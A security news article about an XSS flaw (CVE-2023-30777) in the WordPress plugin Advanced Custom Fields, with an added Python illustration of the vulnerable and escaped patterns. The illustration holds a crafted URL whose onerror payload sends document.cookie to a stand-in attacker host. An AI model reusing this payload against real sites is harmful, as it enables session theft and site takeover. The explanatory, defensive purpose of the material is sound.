A popular plugin for the WordPress website builder with more than two million active installs carried a severe flaw that allowed threat actors to steal sensitive data from visitors and, in some cases, take over the website entirely.
The plugin is called Advanced Custom Fields which, together with its Pro version, gives website administrators more control over the site's content and data.
However, the plugin was vulnerable to a cross-site scripting (XSS) attack, which lets attackers inject malicious script into vulnerable websites. The script then runs in the visitor's browser, in the context of the site, allowing the attackers to grab sensitive data such as session cookies or security tokens. If one of the visitors also happens to be the site's admin, the attacker can grab their data too, perform actions with their privileges, and ultimately take over the website completely.
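To make the mechanism concrete, here is an added illustration (written for this page, not code from the Advanced Custom Fields plugin or from Patchstack) of the reflected-XSS pattern described above: a request parameter is copied into an HTML attribute without escaping, so a crafted URL that a privileged user is lured into opening injects a script that exfiltrates the victim's cookies. The host, path, parameter name (`view`) and payload are all constructed for the example; the hardened variant simply HTML-escapes the value, which is what WordPress's `esc_attr()` does in PHP.

```python
import html
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample URL: an attacker lures a logged-in admin into opening it.
# Host, path, parameter name and payload are illustrative, not the plugin's.
# Decoded, the "view" value is:  "><img src=x onerror="fetch('https://attacker.test/?c='+document.cookie)">
CRAFTED_URL = (
    "https://example.test/wp-admin/edit.php?page=fields"
    "&view=%22%3E%3Cimg%20src%3Dx%20onerror%3D%22fetch('https://attacker.test/?c='"
    "%2Bdocument.cookie)%22%3E"
)


def reflected_param(url: str, name: str) -> str:
    """Return the percent-decoded value of a query parameter, as the server would see it."""
    qs = parse_qs(urlparse(url).query, keep_blank_values=True)
    return qs.get(name, [""])[0]


def render_unsafe(view: str) -> str:
    """Vulnerable pattern: the parameter is reflected into a class attribute verbatim.
    A value containing '">' closes the attribute and the tag, and whatever follows
    is parsed as new markup by the victim's browser."""
    return f'<body class="wp-admin view-{view}">'


def render_safe(view: str) -> str:
    """Hardened pattern: escape &, <, >, " and ' before reflecting (PHP: esc_attr()).
    The attacker's quotes and angle brackets become entities and stay inside the attribute."""
    return f'<body class="wp-admin view-{html.escape(view, quote=True)}">'


_TAG_START = re.compile(r"<\s*[a-zA-Z]")


def attribute_breakout(rendered: str) -> bool:
    """True if anything after the first '>' (the end of the <body ...> tag as the
    browser sees it) starts a new element, i.e. the reflected value escaped the attribute."""
    end = rendered.find(">")
    return bool(_TAG_START.search(rendered[end + 1:]))


if __name__ == "__main__":
    value = reflected_param(CRAFTED_URL, "view")
    for label, out in (("unsafe", render_unsafe(value)), ("safe", render_safe(value))):
        print(f"{label:6s} breakout={attribute_breakout(out)!s:5s} {out}")
```

The check `attribute_breakout` is deliberately crude (a real browser's parser is more forgiving than one regex), but it is enough to show the difference: the unescaped render yields a standalone `<img>` with an `onerror` handler that would run in the admin's session, while the escaped render keeps the entire payload as inert text inside the `class` value. This also matches the condition Patchstack describes below: the injected script only does damage if the person opening the crafted URL is already logged in with access to the plugin's admin pages.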
Patching the flaw
The vulnerability was first discovered in early February 2023 by Patchstack researcher Rafie Muhammad and reported to the plugin's vendor, Delicious Brains.
It was assigned the tracking number CVE-2023-30777 and rated 6.1/10 (medium) in CVSS severity. Three months later, in early May 2023, Delicious Brains issued a patch that addressed the flaw and brought the plugin up to version 6.1.6. Admins worried about cross-site scripting attacks should make sure the plugin is updated to at least this version as soon as possible, for example by checking the installed version in the WordPress plugins screen or with WP-CLI's `wp plugin list`.
“This vulnerability allows any unauthenticated user [to steal] sensitive information to, in this case, privilege escalation on the WordPress site by tricking the privileged user to visit the crafted URL path,” Patchstack says. “This vulnerability could be triggered on a default installation or configuration of Advanced Custom Fields plugin. The XSS also could only be triggered from logged-in users that have access to the Advanced Custom Fields plugin,” the researchers concluded.
According to The Register, the flaw is relatively simple and is one of four found in this plugin in the last couple of years.
Via: The Register